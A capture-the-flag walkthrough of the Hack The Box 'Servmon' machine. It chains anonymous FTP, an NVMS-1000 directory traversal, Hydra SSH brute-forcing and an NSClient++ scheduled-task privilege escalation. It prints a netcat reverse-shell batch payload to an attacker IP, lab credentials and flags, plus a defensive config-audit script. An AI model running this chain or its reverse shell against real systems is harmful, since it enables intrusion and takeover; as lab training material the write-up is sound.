Servmon

TL;DR

  • Connect anonymously to the FTP server and find notes about the location of the passwords file
  • Use the LFI in NVMS to read the passwords file
  • Brute-force SSH with the passwords file to get access
  • Reuse the password to connect to the Nsclient++ Web UI
  • Create an Nsclient++ scheduled task to execute a reverse shell as Administrator

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/servmon$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
# Nmap 7.60 scan initiated Sat Apr 18 18:36:13 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
Increasing send delay for 10.10.10.184 from 0 to 5 due to 136 out of 453 dropped probes since last increase.
Warning: 10.10.10.184 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.184 from 640 to 1000 due to 185 out of 616 dropped probes since last increase.
Nmap scan report for servmon.htb (10.10.10.184)
Host is up, received echo-reply ttl 127 (0.078s latency).
Scanned at 2020-04-18 18:36:13 CEST for 306s
Not shown: 54168 closed ports, 11351 filtered ports
Reason: 54168 resets and 11351 no-responses
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnC92+BCplDo38VDQIZzb7V3HN/OucvxF0VMDDoYShdUrpDUW6JcSR/Zr6cADbHy7eDLw2O+WW+M4SzH7kfpbTv3HvJ0z8iOsRs2nUrUint4CR/A2vYA9SFOk18FU0QUS0sByBIlemU0uiPxN+iRCcpFhZDj+eiVRF7o/XxNbExnhU/2n9MXwFS8XTYNeGqSLE1vV6KdpMfpJj/yey8gvEpDQTX5OQK+kkUHze3LXLyu/XVTKzfqUBMAP+IQ5F6ICWgaC1a+cx/D7C/aobCbqaXY+75t1mxbEMmm1Wv/42nVQxcT7tN2C3sds4VJkYgZKcBhsE0XdJcR9mTb1wWsg9
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMToH2eB7rzpMZuvElpHYko/TXSsOfG8EXWQxmC/T4PCaAmVRDgJWEFMHgpRilSAKoOBlS2RHWNpMJldTFbWSVo=
|   256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbqSRVLRJFVNhD0W0C5xB7b3RoJZZKdM+jSGryFWOQa
80/tcp    open  tcpwrapped    syn-ack ttl 127
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_  Supported Methods: POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
5040/tcp  open  unknown       syn-ack ttl 127
5666/tcp  open  tcpwrapped    syn-ack ttl 127
6063/tcp  open  x11?          syn-ack ttl 127
6699/tcp  open  napster?      syn-ack ttl 127
7680/tcp  open  pando-pub?    syn-ack ttl 127
8443/tcp  open  ssl/https-alt syn-ack ttl 127
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|_    Document not found
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after:  2021-01-13T13:24:20
| MD5:   1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-18 18:43:52
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 18:41:19 2020 -- 1 IP address (1 host up) scanned in 306.51 seconds

So we find 4 useful services:

  • FTP (21)
  • SSH (22)
  • IIS (80)
  • NSClient++ (8443)

The website is an NVMS login page.

[Screenshot: Website]

Ftp anonymous

Let’s try to connect to the FTP service with the anonymous account.

magnussen@funcMyLife:~/servmon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:magnussen): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
01-18-20  12:05PM       <DIR>          Users
ftp> dir Users
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
ftp> dir Users/Nadine
01-18-20  12:08PM                  174 Confidential.txt
ftp> get Users/Nadine/Confidential.txt
226 Transfer complete.
174 bytes received in 0.06 secs (2.8721 kB/s)
ftp> dir Users/Nathan
01-18-20  12:10PM                  186 Notes to do.txt
ftp> get Users/Nathan/Notes\ to\ do.txt
226 Transfer complete.
186 bytes received in 0.06 secs (2.9735 kB/s)

So there are two directories, Nadine and Nathan, probably two system users. We also retrieved two text files; let’s read them.

magnussen@funcMyLife:~/servmon$ cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
magnussen@funcMyLife:~/servmon$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Ok, it seems there’s a passwords file on Nathan’s desktop.

NVMS-1000 LFI

When we search for CVEs on NVMS-1000 we find the following exploit: TVT NVMS 1000 - Directory Traversal.

Let’s check that out:

[Screenshot: LFI]

This NVMS-1000 version is vulnerable to LFI; let’s try to retrieve the passwords file mentioned earlier.

[Screenshot: LFI]

Nice, we retrieved a password list.

SSH brute force

So we have a password list and some usernames; let’s brute-force the SSH service to see if we can log in with one of the accounts.

As SSH usernames are case sensitive, I’ve created a file with both usernames, each with the first letter in upper and lower case.

magnussen@funcMyLife:~/servmon$ cat user.txt
Nadine
nadine
Nathan
nathan
magnussen@funcMyLife:~/servmon$ cat Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
magnussen@funcMyLife:~/servmon$ hydra -L user.txt -P Passwords.txt -s 22 -f servmon.htb ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 01:41:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://servmon.htb:22/
[22][ssh] host: servmon.htb   login: Nadine   password: L1k3B1gBut7s@W0rk
[STATUS] attack finished for servmon.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 01:41:10

Nice, we can log in as Nadine with L1k3B1gBut7s@W0rk.

magnussen@funcMyLife:~/servmon$ ssh Nadine@servmon.htb
Nadine@servmon.htb's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.     
 Volume Serial Number is 728C-D22C   

 Directory of C:\Users\Nadine        

19/04/2020  00:42    <DIR>          .
19/04/2020  00:42    <DIR>          ..        
19/04/2020  00:23    <DIR>          .ssh      
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts  
08/04/2020  22:28    <DIR>          Desktop   
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links     
18/01/2020  11:23    <DIR>          Music     
18/01/2020  11:31    <DIR>          OneDrive  
18/01/2020  11:23    <DIR>          Pictures  
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              16 Dir(s)  27,439,128,576 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
19/04/2020  00:16                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,438,882,816 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
3f12d64256b352f6d6aa65bd0e64e78c

Great, we have the user.txt flag. Just have to privesc now!

I AM ROOT

Nsclient++ privilege escalation

Previously we found the Nsclient++ Web UI:

Nsclient++ is a monitoring agent used with Nagios.

[Screenshot: Nsclient++]

If we check for CVEs on NSClient++ we find the exploit NSClient++ 0.5.2.35 - Privilege Escalation.

Let’s retrieve the password of the WEB UI to exploit this CVE.

nadine@SERVMON C:\Users\Nadine\Desktop>cd "C:\Program Files"

nadine@SERVMON C:\Program Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:21    <DIR>          Common Files
08/04/2020  23:18    <DIR>          Internet Explorer
19/03/2019  05:52    <DIR>          ModifiableWindowsApps
16/01/2020  19:11    <DIR>          NSClient++
08/04/2020  23:09    <DIR>          Reference Assemblies
08/04/2020  23:21    <DIR>          UNP
14/01/2020  09:14    <DIR>          VMware
08/04/2020  22:31    <DIR>          Windows Defender
08/04/2020  22:45    <DIR>          Windows Defender Advanced Threat Protection
19/03/2019  05:52    <DIR>          Windows Mail
19/03/2019  12:43    <DIR>          Windows Multimedia Platform
19/03/2019  06:02    <DIR>          Windows NT
19/03/2019  12:43    <DIR>          Windows Photo Viewer
19/03/2019  12:43    <DIR>          Windows Portable Devices
19/03/2019  05:52    <DIR>          Windows Security
19/03/2019  05:52    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  27,434,434,560 bytes free

nadine@SERVMON C:\Program Files>cd "NSClient++"

nadine@SERVMON C:\Program Files\NSClient++>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files\NSClient++

16/01/2020  19:11    <DIR>          .
16/01/2020  19:11    <DIR>          ..
09/12/2015  01:17            28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015  01:17            50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015  01:17           117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015  01:22           439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015  01:23           256,000 boost_python-vc110-mt-1_58.dll
09/12/2015  01:17           765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015  01:16            19,456 boost_system-vc110-mt-1_58.dll
09/12/2015  01:18           102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020  14:24                51 boot.ini
18/01/2018  16:51           157,453 changelog.txt
28/01/2018  23:33         1,210,392 check_nrpe.exe
19/04/2020  00:50    <DIR>          crash-dumps
05/11/2017  22:09           318,464 Google.ProtocolBuffers.dll
09/12/2015  00:16         1,655,808 libeay32.dll
05/11/2017  23:04            18,351 license.txt
05/10/2017  08:19           203,264 lua.dll
14/01/2020  14:24    <DIR>          modules
19/04/2020  00:47             3,792 nsclient.ini
19/04/2020  00:49            48,207 nsclient.log
05/11/2017  22:42            55,808 NSCP.Core.dll
28/01/2018  23:32         4,765,208 nscp.exe
05/11/2017  22:42           483,328 NSCP.Protobuf.dll
19/11/2017  17:18           534,016 nscp_json_pb.dll
19/11/2017  16:55         2,090,496 nscp_lua_pb.dll
23/01/2018  21:57           507,904 nscp_mongoose.dll
19/11/2017  16:49         2,658,304 nscp_protobuf.dll
05/11/2017  23:04             3,921 old-settings.map
28/01/2018  23:21         1,973,760 plugin_api.dll
23/05/2015  09:44         3,017,216 python27.dll
27/09/2015  16:42        28,923,515 python27.zip
28/01/2018  23:34           384,536 reporter.exe
19/04/2020  00:24    <DIR>          scripts
14/01/2020  14:24    <DIR>          security
09/12/2015  00:16           348,160 ssleay32.dll
23/05/2015  09:44           689,664 unicodedata.pyd
14/01/2020  14:24    <DIR>          web
05/11/2017  22:20         1,273,856 where_filter.dll
23/05/2015  09:44            47,616 _socket.pyd
              33 File(s)     53,153,314 bytes
               7 Dir(s)  27,433,824,256 bytes free

nadine@SERVMON C:\Program Files\NSClient++>typensclient.ini
'typensclient.ini' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts  
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]

; Undocumented key
gen = scripts\gen.bat

; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true


; SCHEDULE DEFENITION - Schedule definition for: default
[/settings/scheduler/schedules/default]

; SCHEDULE INTERAVAL - Time in seconds between each check
interval = 60


; Web server - Section for WEB (WEBServer.dll) (check_WEB) protocol options.
[/settings/WEB/server]

; ALLOWED HOSTS - A comma separated list of allowed hosts. You can use netmasks (/ syntax) or * to create ranges. parent for this key is found under: /settings/default this is marked as advanced in favor of the parent.
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23


; script: default - The configuration section for the  default script.
[/settings/external scripts/scripts/default]

We found the password for the Web UI (ew2x6SsGTxjRwXOT), and another interesting piece of information: the only host allowed to connect to the admin interface is localhost.

Not a problem, let’s do some port forwarding before accessing the Web UI.
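The settings in this dump are what make the chain work, so here is a small audit of them, as an added example that is not part of the original writeup. It parses an nsclient.ini excerpt modelled on the dump above (the "custom" script entry pointing at c:\temp is constructed) and flags the plaintext password, non-loopback allowed hosts, allow arguments = true, scripts registered outside the scripts directory, and the WEBServer + Scheduler + CheckExternalScripts combination that lets anyone with the Web UI password run commands under the service account.

```python
# Added example (not part of the original writeup): audit an NSClient++
# nsclient.ini for the settings this box chains together.
import configparser
import ipaddress
# Constructed excerpt modelled on the nsclient.ini dumped above; the
# "custom" entry is constructed to mirror a script registered from c:\temp.
SAMPLE_INI = r"""
[/settings/default]
password = ew2x6SsGTxjRwXOT
[/modules]
WEBServer = enabled
Scheduler = enabled
CheckExternalScripts = enabled
[/settings/external scripts/scripts]
gen = scripts\gen.bat
custom = c:\temp\custom.bat
[/settings/external scripts]
allow arguments = true
[/settings/WEB/server]
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23
"""

def load_nsclient_ini(text):
    """Parse NSClient++ INI text; keep key case, leave %SCRIPT%-style values alone."""
    cfg = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cfg.optionxform = str
    cfg.read_string(text)
    return cfg

def is_loopback(entry):
    try:
        net = ipaddress.ip_network(entry, strict=False)
    except ValueError:  # hostname or '*' wildcard: never treat as loopback
        return False
    return net.network_address.is_loopback and net.broadcast_address.is_loopback

def non_loopback_hosts(value):
    """Entries of a comma-separated 'allowed hosts' value that are not loopback."""
    return [e.strip() for e in value.split(",") if e.strip() and not is_loopback(e.strip())]

def audit(cfg):
    """Return (section, key, message) tuples for the risky settings."""
    findings = []
    on = {m for m, v in cfg.items("/modules") if v.strip().lower() == "enabled"} if cfg.has_section("/modules") else set()
    if cfg.has_option("/settings/default", "password"):
        findings.append(("/settings/default", "password", "plaintext password readable by local users"))
    for section in cfg.sections():
        if cfg.has_option(section, "allowed hosts"):
            for host in non_loopback_hosts(cfg.get(section, "allowed hosts")):
                findings.append((section, "allowed hosts", f"non-loopback host {host}"))
    if "CheckExternalScripts" in on and cfg.getboolean(
            "/settings/external scripts", "allow arguments", fallback=False):
        findings.append(("/settings/external scripts", "allow arguments", "clients pass arbitrary script arguments"))
    if cfg.has_section("/settings/external scripts/scripts"):
        for name, cmd in cfg.items("/settings/external scripts/scripts"):
            if not cmd.strip().lower().startswith("scripts\\"):
                findings.append(("/settings/external scripts/scripts", name, f"script outside scripts\\: {cmd}"))
    if {"WEBServer", "Scheduler", "CheckExternalScripts"} <= on:
        findings.append(("/modules", "Scheduler", "web UI can define and schedule scripts under the service account"))
    return findings

if __name__ == "__main__":
    for section, key, message in audit(load_nsclient_ini(SAMPLE_INI)):
        print(f"[{section}] {key}: {message}")
```

Feed load_nsclient_ini the contents of the real file (the nsclient.ini under C:\Program Files\NSClient++ above) to audit a live install.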

magnussen@funcMyLife:~/servmon$ ssh -L 8443:127.0.0.1:8443 Nadine@servmon.htb
Nadine@servmon.htb's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

First, we have to upload our payload and a netcat executable to the victim so the scheduled task can execute it.

magnussen@funcMyLife:~/servmon$ cat magnussen.bat
@echo off
c:\temp\nc.exe 10.10.15.111 7777 -e cmd.exe
magnussen@funcMyLife:~/servmon$ scp magnussen.bat  Nadine@servmon.htb:c:/temp/
Nadine@servmon.htb's password:
magnussen.bat                                           100%   54     0.8KB/s   00:00    
magnussen@funcMyLife:~/servmon$ scp nc.exe Nadine@servmon.htb:c:/temp/
nc.exe                                           100%   54     0.8KB/s   00:00    

We have to create a custom script through the Web UI in order to execute our payload from a scheduled task.

[Screenshot: Schedule Task]

Then we have to create a scheduled task to execute our custom script.

[Screenshot: Schedule Task]

Finally, we restart the service in order to apply the new configuration and wait for the connection.

magnussen@funcMyLife:~/servmon$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from servmon.htb 56452 received!
C:\Program Files\NSClient++> dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
23/04/2020  08:58                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,433,795,584 bytes free
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
887fe3797897795b474ceba6a399f7bd

I AM ROOT!

This was a fun box, pretty easy, but I’ve learned a few things, thanks dmw0ng!